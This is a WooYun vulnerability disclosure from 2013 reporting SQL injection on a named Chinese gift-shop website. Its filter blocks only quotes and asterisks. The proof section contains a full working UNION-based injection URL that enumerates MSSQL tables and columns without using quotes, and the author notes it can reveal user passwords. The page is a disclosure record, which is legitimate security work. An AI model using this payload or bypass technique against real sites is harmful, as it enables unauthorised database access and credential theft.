当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
伍氏特香包网SQL注入漏洞(部分关键字限制绕过)
相关厂商:
漏洞作者:
提交时间:
2013-08-13 11:52
修复时间:
2013-09-27 11:52
公开时间:
2013-09-27 11:52
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2013-08-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

伍氏特香包存在SQL注入,只过滤了单引号'和星号*

详细说明:

伍氏特香包存在SQL注入,只过滤了单引号'和星号*

漏洞证明:

http://www.texiangbao.com/Shop/Help.aspx?NewsId=29 and 1=2 union all select top 1 1,name,3,4,user from syscolumns where id=(select id from sysobjects where ascii(xtype)=85 and id=(select top 1 id from sysobjects where ascii(type)=85 and id not in (select top 18 id from sysobjects where ascii(xtype)=85))) and name not in (select top 7 name from syscolumns where id=(select id from sysobjects where ascii(xtype)=85 and id=(select top 1 id from sysobjects where ascii(type)=85 and id not in (select top 18 id from sysobjects where ascii(xtype)=85))))
只过滤 单引号是没用的,照样可以获取各种信息,用户密码什么的~

54.jpg

修复方案:

类型转换吧

版权声明:转载请注明来源 姿势不行@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝